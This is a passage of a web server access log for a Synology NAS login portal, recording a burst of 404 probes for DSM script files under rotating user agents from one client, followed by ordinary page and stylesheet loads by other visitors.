"/sds/dist/dsm.sds.bundle.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Screaming Frog SEO Spider/8.1" "-" +[14/Jan/2026:19:37:49 +0000] - 404 404 - GET https nas.profibot.hu "/syno-vue-components/syno-vue-components.min.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0" "-" +[14/Jan/2026:19:37:49 +0000] - 404 404 - GET https nas.profibot.hu "/sds/dist/dsm.common.bundle.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.84 Safari/537.36" "-" +[14/Jan/2026:19:38:09 +0000] - 404 404 - GET https nas.profibot.hu "/noise/constants.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36" "-" +[14/Jan/2026:19:38:09 +0000] - 404 404 - GET https nas.profibot.hu "/noise/noise-c.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16" "-" +[14/Jan/2026:19:38:09 +0000] - 404 404 - GET https nas.profibot.hu "/ext-3/ux/ux-all.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "SEC-SGHX210/1.0 UP.Link/6.3.1.13.0" "-" +[14/Jan/2026:19:38:09 +0000] - 404 404 - GET https nas.profibot.hu "/noise/index.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36" "-" +[14/Jan/2026:19:38:09 +0000] - 404 404 - GET https nas.profibot.hu "/synowebapi.js/synowebapi.min.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 9; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-" +[14/Jan/2026:19:38:09 +0000] - 404 404 - GET https nas.profibot.hu "/login/dist/dsm.login.bundle.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 9; HMA-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-" +[14/Jan/2026:19:38:09 +0000] - 404 404 - GET https nas.profibot.hu "/ext-3/adapter/ext/ext-base.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-" +[14/Jan/2026:19:38:09 +0000] - 404 404 - GET https nas.profibot.hu "/noise/sodium.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36" "-" +[14/Jan/2026:19:38:09 +0000] - 404 404 - GET https nas.profibot.hu "/babel-polyfill/polyfill.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36" "-" +[14/Jan/2026:19:38:09 +0000] - 404 404 - GET https nas.profibot.hu "/vendor.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" "-" +[14/Jan/2026:19:38:09 +0000] - 404 404 - GET https nas.profibot.hu "/unsupported-browsers/dist/bundle.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 9; EML-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36" "-" +[14/Jan/2026:19:38:09 +0000] - 404 404 - GET https nas.profibot.hu "/vuex/vuex.min.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 OPR/58.0.3135.132" "-" +[14/Jan/2026:19:38:09 +0000] - 404 404 - GET https nas.profibot.hu "/scrollbar/flexcroll.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.145 Safari/537.36 Vivaldi/2.6.1566.49" "-" +[14/Jan/2026:19:38:09 +0000] - 404 404 - GET https nas.profibot.hu "/syno-vue-components/syno-vue-components.min.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "HTMLParser/1.6" "-" +[14/Jan/2026:19:38:09 +0000] - 404 404 - GET https nas.profibot.hu "/sds/dist/dsm.sds.bundle.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6" "-" +[14/Jan/2026:19:38:09 +0000] - 404 404 - GET https nas.profibot.hu "/synocredential.js/synocredential.min.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3880.5 Mobile Safari/537.36" "-" +[14/Jan/2026:19:38:09 +0000] - 404 404 - GET https nas.profibot.hu "/taskbar/dist/dsm.taskbar.bundle.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36" "-" +[14/Jan/2026:19:38:09 +0000] - 404 404 - GET https nas.profibot.hu "/sds.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 SonyEricssonP100/01; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 Safari/525" "-" +[14/Jan/2026:19:38:09 +0000] - 404 404 - GET https nas.profibot.hu "/sds/dist/dsm.common.bundle.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)" "-" +[14/Jan/2026:19:38:10 +0000] - 404 404 - GET https nas.profibot.hu "/vue-router/vue-router.min.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Nokia6630/1.0 (2.39.15) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1" "-" +[14/Jan/2026:19:38:10 +0000] - 404 404 - GET https nas.profibot.hu "/vue/vue.min.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 7.0; KIICAA POWER) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36" "-" +[14/Jan/2026:19:38:11 +0000] - 404 404 - GET https nas.profibot.hu "/desktop/dist/dsm.desktop.bundle.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/65.0.3325.181 Chrome/65.0.3325.181 Safari/537.36" "-" +[14/Jan/2026:19:38:11 +0000] - 404 404 - GET https nas.profibot.hu "/entry/dist/dsm.entry.bundle.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 9; MI 8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-" +[14/Jan/2026:19:38:13 +0000] - 404 404 - GET https nas.profibot.hu "/ext-3/ext-all.js" [Client 45.139.104.168] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/76.0.3809.81 Mobile/15E148 Safari/605.1" "-" +[15/Jan/2026:04:22:21 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 84.254.106.197] [Length 766] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:04:22:21 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/sencha-touch-2.4.1/touch.js?v=42962" [Client 84.254.106.197] [Length 199829] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:04:22:22 +0000] - 200 200 - GET https nas.profibot.hu "/mobile/ui/style.css?v=42962" [Client 84.254.106.197] [Length 11144] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:04:22:22 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs_mobile&SynoToken=" [Client 84.254.106.197] [Length 64] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:04:22:22 +0000] - 404 404 - GET https nas.profibot.hu "/css/support_parent.css" [Client 84.254.106.197] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:04:22:22 +0000] - 404 404 - GET https nas.profibot.hu "/js/twint_ch.js" [Client 84.254.106.197] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:04:22:22 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=42962" [Client 84.254.106.197] [Length 64] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:04:22:22 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/sencha-touch-2.4.1/resources/css/cupertino.css?v=42962" [Client 84.254.106.197] [Length 69221] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:04:22:22 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.JSUIString&version=1&method=getjs&lang=hun&v=42962" [Client 84.254.106.197] [Length 64] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:04:22:22 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.Defs&version=1&method=getjs&v=42962&SynoToken=" [Client 84.254.106.197] [Length 64] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:04:22:22 +0000] - 200 200 - GET https nas.profibot.hu "/mobile/ui/mobile.js?v=42962" [Client 84.254.106.197] [Length 121291] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:04:22:22 +0000] - 200 200 - GET https nas.profibot.hu "/webman/favicon.ico?v=42962" [Client 84.254.106.197] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:04:22:22 +0000] - 404 404 - GET https nas.profibot.hu "/js/lkk_ch.js" [Client 84.254.106.197] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:04:22:22 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/webapierrorcode.js?v=42962" [Client 84.254.106.197] [Length 5495] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:05:07:10 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 198.12.106.59] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/" [Client 84.1.26.27] [Length 2819] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/unsupported-browsers/dist/bundle.css?v=1661421011" [Client 84.1.26.27] [Length 590] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/scrollbar/flexcroll.css?v=1650348555" [Client 84.1.26.27] [Length 360] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3.4/resources/css/ext-all.css?v=1650348555" [Client 84.1.26.27] [Length 12533] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/syno-vue-components/style/syno-vue-components.css?v=1652869476" [Client 84.1.26.27] [Length 26445] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/ux-all.css?v=1650348555" [Client 84.1.26.27] [Length 25110] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ExternalDevices/style.css?v=1661421011" [Client 84.1.26.27] [Length 1004] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/desktop/dist/style.css?v=1661421011" [Client 84.1.26.27] [Length 4183] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/style.css?v=1661421011" [Client 84.1.26.27] [Length 6059] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/style.css?v=1661421011" [Client 84.1.26.27] [Length 6016] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DataDrivenDocuments/style.css?v=1661421011" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/resources/css/desktop.css?v=1661421011" [Client 84.1.26.27] [Length 11272] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/sds.css?v=1654081517" [Client 84.1.26.27] [Length 8242] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SupportForm/style.css?v=1661757678" [Client 84.1.26.27] [Length 494] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/C3/style.css?v=1661421011" [Client 84.1.26.27] [Length 780] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SystemInfoApp/style.css?v=1661421011" [Client 84.1.26.27] [Length 2735] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/EnableNewUpdateSetting/style.css?v=1661421011" [Client 84.1.26.27] [Length 983] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ActiveInsightUpdateNotify/style.css?v=1661421011" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/HotkeyManager/style.css?v=1661421011" [Client 84.1.26.27] [Length 1136] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PollingTask/style.css?v=1661757678" [Client 84.1.26.27] [Length 609] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PersonalSettings/style.css?v=1661757678" [Client 84.1.26.27] [Length 4474] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DiskMessageHandler/style.css?v=1661421011" [Client 84.1.26.27] [Length 575] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SecurityScan/style.css?v=1652943644" [Client 84.1.26.27] [Length 4601] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/LogCenter/style.css?v=1657013615" [Client 84.1.26.27] [Length 2048] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/VideoPlayer2/style.css?v=1649656611" [Client 84.1.26.27] [Length 1998] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PkgManApp/style.css?v=1661757678" [Client 84.1.26.27] [Length 5292] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/style.css?v=1661421011" [Client 84.1.26.27] [Length 28078] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DesktopProgress/style.css?v=1661757678" [Client 84.1.26.27] [Length 860] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SharingManager/style.css?v=1661757678" [Client 84.1.26.27] [Length 229] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ClipBoardJS/style.css?v=1661757678" [Client 84.1.26.27] [Length 387] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PhotoViewer/style.css?v=1661757678" [Client 84.1.26.27] [Length 3361] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/FileChooserV6/style.css?v=1661757678" [Client 84.1.26.27] [Length 1098] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/style.css?v=1661421011" [Client 84.1.26.27] [Length 6761] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/TaskSchedulerUtils/style.css?v=1661757678" [Client 84.1.26.27] [Length 104] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/OTPWizard/style.css?v=1661757678" [Client 84.1.26.27] [Length 870] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/MyDSCenter/style.css?v=1661757678" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/UpdateMaskApp/style.css?v=1661421011" [Client 84.1.26.27] [Length 481] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/style.css?v=1661421011" [Client 84.1.26.27] [Length 3239] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:05 +0000] - 200 200 - GET https nas.profibot.hu 